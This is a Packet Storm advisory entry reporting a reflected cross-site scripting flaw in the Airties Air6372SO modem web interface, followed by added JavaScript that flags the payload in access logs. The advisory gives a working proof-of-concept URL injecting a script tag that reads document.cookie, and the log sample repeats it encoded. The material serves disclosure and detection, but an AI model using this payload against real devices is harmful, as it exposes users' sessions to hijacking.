Airties Air6372SO Modem Web Interface Cross Site Scripting

2014-09-09T00:00:00
ID PACKETSTORM:128213
Type packetstorm
Reporter KnocKout
Modified 2014-09-09T00:00:00

Description

                                        
                                            `Airties Air6372SO Modem Web Interface XSS/Iframe Injection Vulnerability  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://cyber-warrior.Org - http://h4x0resec.blogspot.com  
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x, apologies to anyone we forgot..  
############################################################  
Turkey Security Group  
'h4x0re SECURITY'   
###########################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Hardware/Web App : Airties  
|~Affected Version : Air6372SO  
|~Official Web: http://www.airties.com  
|~RISK : Light  
|~Tested On : Kali Linux \ Windows XP \ Windows Vista \ Airties Air6372SO Modem Web Interface  
####################INFO################################  
The web interface can be easily operated without a root login.  
  
Exploitation;  
==============================================================================  
http://$MODEMROOT/top.html?productboardtype= ?  
  
http://192.168.2.1/top.html?productboardtype=<b>H4x0reSec</b> <script>alert(document.cookie)</script>  
==============================================================================  
  
`
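
Added example (not part of the original advisory and not Airties code): a log check that flags requests to top.html whose productboardtype value decodes to anything other than a plain identifier, which is how the reflected markup shown above would appear in a proxy or gateway access log. The combined log format, the sample lines and the allow-list pattern for legitimate values are assumptions made for this example.

```javascript
const TARGET_PATH = '/top.html';
const PARAM = 'productboardtype';
// Assumption: a legitimate board-type value is a short identifier.
const EXPECTED_VALUE = /^[A-Za-z0-9._-]{0,32}$/;

// Percent-decode repeatedly (bounded) so nested encoding cannot hide markup.
function fullyDecode(value, maxRounds = 3) {
  let current = value.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; } // malformed escape: stop here
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return the raw parameter value if the request targets top.html, else null.
function extractParam(requestTarget) {
  const q = requestTarget.indexOf('?');
  if (q === -1 || requestTarget.slice(0, q).toLowerCase() !== TARGET_PATH) return null;
  for (const pair of requestTarget.slice(q + 1).split('&')) {
    const eq = pair.indexOf('=');
    const name = eq === -1 ? pair : pair.slice(0, eq);
    if (fullyDecode(name).toLowerCase() === PARAM) return eq === -1 ? '' : pair.slice(eq + 1);
  }
  return null;
}

// Return the log lines whose decoded value falls outside the allow-list.
function findSuspiciousRequests(logLines) {
  const flagged = [];
  for (const line of logLines) {
    const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
    const raw = m ? extractParam(m[1]) : null;
    if (raw === null) continue;
    const decoded = fullyDecode(raw);
    if (!EXPECTED_VALUE.test(decoded)) flagged.push({ line, decoded });
  }
  return flagged;
}

// Constructed sample lines (combined log format), not taken from a real device.
const SAMPLE_LOG = [
  '192.168.2.10 - - [09/Sep/2014:10:00:01 +0000] "GET /top.html?productboardtype=AIR6372 HTTP/1.1" 200 512',
  '192.168.2.10 - - [09/Sep/2014:10:00:07 +0000] "GET /top.html?productboardtype=%3Cb%3EH4x0reSec%3C%2Fb%3E%20%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 540',
  '192.168.2.10 - - [09/Sep/2014:10:00:09 +0000] "GET /index.html?productboardtype=%3Cb%3E HTTP/1.1" 404 0',
];
for (const hit of findSuspiciousRequests(SAMPLE_LOG)) console.log('review:', hit.decoded);
```

The same allow-list pattern can be applied as input validation on the device side, with HTML encoding of the value wherever it is written into the page.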